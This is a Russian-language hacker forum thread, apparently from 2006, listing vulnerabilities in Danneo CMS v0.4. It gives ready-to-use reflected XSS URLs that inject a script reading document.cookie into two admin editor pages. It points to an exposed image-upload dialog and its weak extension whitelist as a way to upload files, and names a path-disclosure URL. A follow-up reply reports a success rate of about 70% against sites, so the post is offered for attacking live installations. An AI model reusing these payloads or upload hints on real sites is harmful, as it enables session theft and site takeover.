Многочисленные уязвимости Danneo CMS

Discussion in 'Уязвимости' started by vectorg, 22 Apr 2006.

  1. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    DanneoCMS v.04
    _http://danneo.com

    1. xxs - куки

    http://danneosite.com/apanel/editor/img_popup.php?img_url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    http://danneosite.com/apanel/editor/file_popup.php?img_url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    2. заливка файлов

    http://danneosite.com/apanel/editor/dialogs/img_library.php

    защита слабенькая:

    http://danneosite.com/apanel/editor/config/spaw_control.config.php -->

    PHP:
    // allowed extentions for uploaded image files
    $spaw_valid_imgs = array('gif''jpg''jpeg''png');
    думайте сами =))

    3. раскрытие путей

    их много, самое простейшее:

    http://danneosite.com/apanel/editor/scripts/demo.php


    Antichat.ru © VectorG
     
    2 people like this.
  2. kot777

    kot777 O-la-la!

    Joined:
    13 Aug 2004
    Messages:
    588
    Likes Received:
    435
    Reputations:
    454
  3. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    пробив 70%
    некоторые доступ к едитору закрывают